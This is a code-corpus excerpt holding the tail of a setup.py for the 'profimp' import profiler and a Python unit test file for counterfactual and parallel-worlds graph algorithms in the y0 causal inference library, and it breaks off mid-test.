< 2.7.4, a lazy loading of package `pbr` will break\n# setuptools if some other modules registered functions in `atexit`.\n# solution from: http://bugs.python.org/issue15881#msg170215\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nconfig = {\n \"name\": \"profimp\",\n \"version\": profimp.__version__,\n \"author\": \"Boris Pavlovic\",\n \"author_email\": \"boris@pavlovic.me\",\n \"url\": \"http://boris-42.me\",\n \"description\": \"profimp - generates tree of imports profiles\",\n \"long_description\": read(\"README.rst\"),\n\n \"classifiers\": [\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: Apache Software 
License\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.4\"\n ],\n\n \"packages\": [\"profimp\"],\n\n \"entry_points\": {\n \"console_scripts\": [\"profimp=profimp.main:main\"]\n }\n}\n\n\nsetup(**config)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"588671220","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests for parallel world graphs and counterfactual graphs.\"\"\"\n\nfrom tests.test_algorithm import cases\nfrom y0.algorithm.identify.cg import (\n World,\n _get_directed_edges,\n extract_interventions,\n has_same_confounders,\n has_same_function,\n is_inconsistent,\n is_not_self_intervened,\n is_pw_equivalent,\n make_counterfactual_graph,\n make_parallel_worlds_graph,\n merge_pw,\n node_not_an_intervention_in_world,\n nodes_attain_same_value,\n nodes_have_same_domain_of_values,\n parents_attain_same_values,\n stitch_counterfactual_and_doppleganger_neighbors,\n stitch_counterfactual_and_dopplegangers,\n stitch_counterfactual_and_neighbors,\n stitch_factual_and_doppleganger_neighbors,\n stitch_factual_and_dopplegangers,\n value_of_self_intervention,\n)\nfrom y0.dsl import A, B, D, Event, W, X, Y, Z\nfrom y0.examples import (\n figure_9a,\n figure_9b,\n figure_9c,\n figure_9d,\n figure_11a,\n figure_11b,\n figure_11c,\n)\nfrom y0.graph import NxMixedGraph\n\nx, y, z, d, w = -X, -Y, -Z, -D, -W\n\n\nclass TestCounterfactualGraph(cases.GraphTestCase):\n \"\"\"Tests parallel worlds and counterfactual graphs.\"\"\"\n\n def test_world(self):\n \"\"\"Test that a world contains an intervention.\"\"\"\n with self.assertRaises(TypeError):\n input_world1: World = World([-x])\n 3 in input_world1 # noqa\n\n with self.assertRaises(TypeError):\n input_world1: World = World([3])\n 3 in input_world1 # noqa\n\n input_world2 = World([-x])\n self.assertFalse(+x in input_world2)\n self.assertFalse(+y in input_world2)\n self.assertTrue(-x in input_world2)\n\n def assert_uedge_set_equal(self, expected, actual):\n \"\"\"Assert that two undirected edge sets are equal.\"\"\"\n return self.assertEqual(\n {frozenset(edge) for edge in expected}, {frozenset(edge) for edge in actual}\n )\n\n def test_make_parallel_worlds(self):\n \"\"\"Test that parallel worlds graphs are correct.\"\"\"\n expected = figure_9b.graph\n actual = make_parallel_worlds_graph(figure_9a.graph, {frozenset([-x]), frozenset([-d])})\n expected2 = make_parallel_worlds_graph(figure_9a.graph, {(-x, -z)})\n self.assert_graph_equal(expected, actual)\n self.assert_graph_equal(expected2, make_parallel_worlds_graph(figure_9a.graph, {(-x, -z)}))\n self.assertTrue(Y @ (-z, -x) in expected2.nodes())\n self.assertTrue(Y @ (-x, -z) in expected2.nodes())\n\n def test_has_same_function(self):\n \"\"\"Test that two variables have the same value.\"\"\"\n self.assertTrue(has_same_function(D @ X, D))\n self.assertFalse(has_same_function(D @ D, D))\n self.assertFalse(has_same_function(X, X @ +x))\n self.assertTrue(has_same_function(X @ D, X))\n self.assertFalse(has_same_function(X, D))\n self.assertFalse(has_same_function(X @ ~X, W @ ~X))\n self.assertFalse(has_same_function(X @ ~X, X))\n self.assertTrue(has_same_function(D, D @ ~x))\n self.assertTrue(has_same_function(Z @ ~x, Z))\n self.assertTrue(has_same_function(Z @ 
~x, Z @ -d))\n self.assertTrue(has_same_function(Z @ -d, Z))\n self.assertTrue(has_same_function(Z @ (-d, -z), Z @ (-x, -z)))\n self.assertTrue(has_same_function(Z @ (-d, -z), Z @ (-x, +z)))\n self.assertFalse(has_same_function(Z @ (-d, -z), Z @ (-d, +x)))\n\n def test_nodes_attain_same_value(self):\n \"\"\"Test that two variables attain the same value.\"\"\"\n event: Event = {D: -d}\n self.assertTrue(nodes_attain_same_value(figure_11a.graph, event, D, D @ -d))\n self.assertTrue(nodes_attain_same_value(figure_11a.graph, event, D @ -d, D))\n self.assertTrue(\n nodes_attain_same_value(\n NxMixedGraph.from_edges(directed=[(D @ +d, Z @ +d)]), event, D @ +d, D @ +d\n )\n )\n self.assertTrue(nodes_attain_same_value(figure_9b.graph, event, D, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -d, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(nodes_attain_same_value(figure_11a.graph, event, Z, Z @ +x))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, X, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X @ -d))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, X @ -d, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X @ -d))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -d, D))\n # This should get us onto the return False on line 56\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, Y @ -X, X))\n # This one should trigger the False on line 59\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y, Y: +Y}, Y @ -X, Y))\n # This one will trigger the True on line 61, but I'm not sure if the event really makes sense\n\n self.assertTrue(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y, Y: -Y}, Y @ -X, Y))\n # I think these two should get the falses on lines 64 and 69\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y}, Y @ -X, Y))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y: +Y}, Y @ -X, Y))\n # These two should get the False on line 73\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {}, Y @ -X, Y))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {}, Y, Y @ -X))\n # These two should get the True on line 74\n self.assertTrue(\n nodes_attain_same_value(NxMixedGraph.from_edges(undirected=[(+Y, -Y)]), {}, +Y, -Y)\n )\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -X, D))\n\n def test_has_same_confounders(self):\n \"\"\"Check whether two nodes have the same confounding edges.\"\"\"\n self.assertFalse(has_same_confounders(figure_9b.graph, D, D))\n self.assertFalse(has_same_confounders(figure_9b.graph, D, D @ -d))\n self.assertFalse(has_same_confounders(figure_9b.graph, D @ -d, D))\n self.assertTrue(has_same_confounders(figure_9b.graph, D @ -x, D))\n self.assertTrue(has_same_confounders(figure_11a.graph, D @ -d, D))\n self.assertTrue(has_same_confounders(figure_9b.graph, D, D @ -x))\n\n def test_parents_attain_same_values(self):\n \"\"\"Test that the parents of two nodes attain the same value.\"\"\"\n graph = figure_9b.graph\n event: Event = {Y @ -x: -y, D: -d, Z @ -d: -z, X: +x}\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z, Z @ -d))\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z, Z @ -x))\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z @ -d, Z @ -x))\n 
self.assertTrue(parents_attain_same_values(figure_11a.graph, event, D, D @ -d))\n self.assertFalse(parents_attain_same_values(graph, event, Z, Z @ -d))\n self.assertFalse(parents_attain_same_values(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(parents_attain_same_values(figure_9b.graph, event, X, X @ -x))\n self.assertFalse(\n parents_attain_same_values(\n NxMixedGraph.from_edges(directed=[(Z, X), (Z, Y), (W, Y)]), event, X, Y\n )\n )\n self.assertFalse(\n parents_attain_same_values(\n NxMixedGraph.from_edges(\n directed=[(X @ -x, Y @ -x), (X @ +x, Y @ +x)], undirected=[(Y @ -x, Y @ +x)]\n ),\n {Y @ -x: -y, Y @ +x: +y},\n Y @ -x,\n Y @ +x,\n )\n )\n\n def test_nodes_have_same_domain_of_values(self):\n \"\"\"Test that two nodes have the same domain of values.\"\"\"\n graph = figure_9b.graph\n event = {Y @ -x: -y, X: +x, D: -d, Z @ -d: -z}\n self.assertTrue(nodes_have_same_domain_of_values(graph, event, D, D @ -x))\n self.assertFalse(nodes_have_same_domain_of_values(graph, event, D, D @ -d))\n self.assertFalse(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x)], undirected=[(Y, Y @ +x)]\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ +x,\n )\n )\n self.assertTrue(nodes_have_same_domain_of_values(figure_9b.graph, event, D @ -X, D))\n self.assertFalse(nodes_have_same_domain_of_values(figure_9b.graph, event, X, Y))\n self.assertFalse(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: -y, Y @ +x: +y},\n X @ -x,\n X @ +x,\n )\n )\n self.assertTrue(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: -y, Y @ +x: +y},\n X @ +x,\n X @ +x,\n )\n )\n self.assertTrue(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: +y, Y @ +x: +y},\n Y @ -x,\n Y @ +x,\n )\n )\n\n def test_value_of_self_intervention(self):\n \"\"\"Return the value of a self intervention.\"\"\"\n self.assertIsNone(value_of_self_intervention(X))\n self.assertEqual(+x, value_of_self_intervention(X @ +x))\n self.assertEqual(-x, value_of_self_intervention(X @ (-x, -y, -d)))\n self.assertIsNone(value_of_self_intervention(X @ -y))\n\n def test_extract_interventions(self):\n \"\"\"Test that all interventions are extracted.\"\"\"\n event = {X: +x, D: -d, Z @ -d: -z}\n expected_worlds = {frozenset({-d})}\n self.assertEqual(expected_worlds, extract_interventions(event))\n\n def test_get_worlds(self):\n \"\"\"Test that all interventions within each world of a counterfactual conjunction are generated.\"\"\"\n self.assert_uedge_set_equal(\n {frozenset([-D]), frozenset([~X])}, extract_interventions([Y @ ~X, X, Z @ -D, D])\n )\n self.assert_uedge_set_equal(\n {frozenset([-D]), frozenset([~X, -Z])},\n extract_interventions([Y @ (~X, -Z), X, Z @ -D, D]),\n )\n\n def test_node_not_an_intervention_in_world(self):\n \"\"\"Test that a node is not an intervention in a world.\"\"\"\n self.assertTrue(node_not_an_intervention_in_world(world=frozenset([-x]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +z]), node=X))\n self.assertTrue(node_not_an_intervention_in_world(world=frozenset([-x, +x]), node=Y))\n 
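# Added commentary (an interpretive note, not from the original tests): in\n        # the y0 DSL used here, a node such as Y @ -x appears to denote the\n        # counterfactual variable Y under the intervention do(X = -x), and a\n        # 'world' is the frozenset of interventions that defines it; this\n        # reading is inferred from the imports and usage above.\n        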
self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x]), node=X))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, -y]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +y]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +y, -y]), node=Y))\n with self.assertRaises(TypeError):\n node_not_an_intervention_in_world(world=frozenset([-x]), node=+Y)\n\n with self.assertRaises(TypeError):\n node_not_an_intervention_in_world(world=frozenset({-x}), node=X @ +x)\n\n def test_stitch_factual_and_dopplegangers(self):\n \"\"\"Test that factual variables and their dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n {(Y, Y @ -x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x), (D, D @ +x), (X, X @ -d), (Y, Y @ -d), (Z, Z @ -d)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n self.assert_uedge_set_equal(\n {\n (Y, Y @ +x),\n (Z, Z @ +x),\n (D, D @ +x),\n (X, X @ -d),\n (Y, Y @ -d),\n (Z, Z @ -d),\n (W, W @ -d),\n (W, W @ +x),\n },\n stitch_factual_and_dopplegangers(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_is_not_self_intervened(self):\n \"\"\"Test that we can detect when a counterfactual variable intervenes on itself.\"\"\"\n self.assertFalse(is_not_self_intervened(Y @ (+x, -y)))\n self.assertTrue(is_not_self_intervened(Y @ (+x, -z)))\n self.assertFalse(is_not_self_intervened(Y @ (+x, +y)))\n\n def test_stitch_factual_and_doppleganger_neighbors(self):\n \"\"\"Test that factual variables and their dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Y @ +x)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)], undirected=[(X, Y)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Z @ +x)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Z @ +x), (X, Z @ -d), (Z, X @ -d)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n\n def test_stitch_counterfactual_and_dopplegangers(self):\n \"\"\"Test counterfactual variables and their 
dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Z @ -d, Z @ +x}), frozenset({Y @ +x, Y @ -d})},\n set(\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ -d, Y @ +x}), frozenset({W @ +x, W @ -d}), frozenset({Z @ +x, Z @ -d})},\n stitch_counterfactual_and_dopplegangers(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_stitch_counterfactual_and_doppleganger_neighbors(self):\n \"\"\"Test that counterfactual variables and their neighbor dopplegangers are stitched together.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ +x})},\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ +x}), frozenset({Y @ +x, Z @ -d}), frozenset({Y @ -d, Z @ +x})},\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Y @ +x})},\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_stitch_counterfactual_and_neighbors(self):\n \"\"\"Test counterfactual variables and their neighbors are stitched together.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n 
stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ +x, Z @ +x})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ -d})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ +x, Z @ +x}), frozenset({Y @ -d, Z @ -d}), frozenset({Z @ -d, X @ -d})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Y @ -d})},\n stitch_counterfactual_and_neighbors(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_get_directed_edges(self):\n \"\"\"Test that the directed edges of a parallel world graph are correctly identified.\"\"\"\n self.assertEqual(\n {\n (X @ -d, Y @ -d),\n (Y @ -d, Z @ -d),\n (D @ -d, X @ -d),\n (X @ +x, Y @ +x),\n (Y @ +x, Z @ +x),\n },\n _get_directed_edges(\n NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z), (D, X)]),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n\n def test_is_pw_equivalent(self):\n \"\"\"Test that two nodes in a parallel world graph are the same (lemma 24).\"\"\"\n event: Event = {Y @ -x: -y, D: -d, Z @ -d: -z, X: +x}\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, D @ -X, D))\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, X @ -D, X))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z, Z @ -X))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, W, W @ -d))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -x, Z))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -d, Z))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -x, Z @ -d))\n self.assertFalse(is_pw_equivalent(figure_11a.graph, event, D @ -d, D))\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, D @ -x, D))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -d, Z))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, X, X @ -X))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, Z, Z @ -X))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, X, X @ -x))\n self.assertFalse(is_pw_equivalent(figure_11a.graph, event, X @ -x, X))\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +y), (X @ -x, Y @ -y)],\n undirected=[(Y @ +y, Y @ -y), (Y @ -y, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X @ +x,\n X @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n 
NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +y), (X @ -x, Y @ -y)],\n undirected=[(Y @ +y, Y @ -y), (Y @ -y, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ +x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +y, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y @ +x,\n Y @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y @ +x,\n Y,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y,\n Y @ -x,\n )\n )\n self.assertTrue(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y, X: -x},\n Y,\n Y @ -x,\n )\n )\n\n def test_merge_pw(self):\n \"\"\"Test the parallel worlds graph after merging two nodes is correct (Lemma 25).\"\"\"\n cf_graph_1, preferred, eliminated = merge_pw(figure_9b.graph, D, D @ -X)\n cf_graph_2, preferred, eliminated = merge_pw(cf_graph_1, X, X @ D)\n # test that we swap the order of the nodes if the first is a counterfactual\n cf_graph_3, preferred, eliminated = merge_pw(cf_graph_2, Z @ -X, Z)\n cf_graph_4, preferred, eliminated = merge_pw(cf_graph_3, Z, Z @ D)\n cf_graph_5, preferred, eliminated = merge_pw(cf_graph_4, W, W @ D)\n cf_graph_6, preferred, eliminated = merge_pw(cf_graph_5, D @ -D, D)\n cf_graph_7, preferred, eliminated = merge_pw(cf_graph_6, Y, Y @ -D)\n # test that we sort the order of the nodes if both are counterfactual\n cf_graph_8, preferred8, eliminated8 = merge_pw(figure_9b.graph, W @ -d, W @ -x)\n # test that we sort the order of the nodes if the both are factual\n cf_graph_9, preferred9, eliminated9 = merge_pw(figure_9b.graph, W, Z)\n self.assert_graph_equal(figure_11a.graph, cf_graph_2)\n self.assert_graph_equal(figure_11b.graph, cf_graph_6)\n self.assert_graph_equal(figure_11c.graph, cf_graph_7)\n self.assert_graph_equal(merge_pw(figure_9b.graph, W @ -x, W @ -d)[0], cf_graph_8)\n self.assert_graph_equal(merge_pw(figure_9b.graph, Z, W)[0], cf_graph_9)\n self.assertTrue(D @ -d not in merge_pw(figure_11a.graph, Z, Z @ -d)[0].nodes())\n\n def test_is_inconsistent(self):\n r\"\"\"Test whether two nodes are inconsistent.\"\"\"\n self.assertTrue(is_inconsistent({D: -d, D @ +x: +d}, D, D @ ~X))\n self.assertTrue(is_inconsistent({D @ -x: -d, D @ +x: +d}, D @ +x, D @ -x))\n self.assertTrue(is_inconsistent({Y @ -x: -y, Y @ +x: +y}, Y @ +x, Y @ -x))\n\n def test_make_counterfactual_graph(self):\n r\"\"\"Test making a counterfactual graph.\n\n The invocation of **make-cg** with the graph in Figure 9(a) and the joint distribution\n :math:`P(y_x, x', z, d)` will result in the counterfactual graph shown in Fig. 9(c).\n The invocation of **make-cg** with the graph in Figure 9(a) and the joint distribution\n :math:`P(y_{x,z},x')` will result in the counterfactual graph shown in Fig. 
9(d).\n \"\"\"\n actual_graph, actual_event = make_counterfactual_graph(\n figure_9a.graph, {Y @ -x: -y, X: +x, Z @ -d: -z, D: -d}\n )\n self.assert_graph_equal(figure_9c.graph, actual_graph)\n self.assertEqual({Y @ -x: -y, X: +x, Z: -z, D: -d}, actual_event)\n actual_graph2, actual_event2 = make_counterfactual_graph(\n figure_9a.graph, {Y @ (-x, -z): -y, X: +x}\n )\n expected_graph2, expected_event2 = figure_9d.graph, {Y @ (-x, -z): -y, X: +x}\n self.assertEqual(expected_event2, actual_event2)\n self.assert_graph_equal(expected_graph2, actual_graph2)\n\n # Check for inconsistent counterfactual values for merged nodes\n actual_graph3, actual_event3 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(D, Z), (Z, Y)]),\n event={Z @ -d: -z, Z: +z, D: -d},\n )\n self.assertIsNone(actual_event3)\n\n # # Check whether {Y_{+x,z,w): -y, X_w: -x} automatically simplifies to {Y_{z,w}: y, X: -x} (it should not)\n # actual_graph4, actual_event4 = make_counterfactual_graph(\n # graph=figure_9a.graph, event={X @ -W: X, Y @ (-W, +X, -Z): Y}\n # )\n # expected_event4 = {Y @ (-W, -Z): Y, X: X}\n # expected_graph4 = NxMixedGraph.from_edges(\n # nodes={W @ -W, Y @ (-W, +X, -Z), Z @ (-W, +X, -Z), X},\n # directed={(W @ -W, Y @ (-W, +X, -Z)), (Z @ (-W, +X, -Z), Y @ (-W, +X, -Z))},\n # undirected={frozenset({X, Y @ (-W, +X, -Z)})},\n # )\n # self.assertNotEqual(expected_event4, actual_event4)\n # self.assert_graph_equal(expected_graph4, actual_graph4)\n\n # Check whether the counterfactual graph is consistent (it is not)\n actual_graph5, actual_event5 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(W, X), (Z, X), (X, Y)]),\n event={Y @ -w: -y, Y @ -z: +y, X @ -w: +x, X @ -z: +x},\n )\n self.assertIsNone(actual_event5)\n\n # Check whether Probability of necessary and sufficient causation induces a W graph\n actual_graph6, actual_event6 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), event={Y @ -x: -y, Y @ +x: +y}\n )\n expected_graph6 = 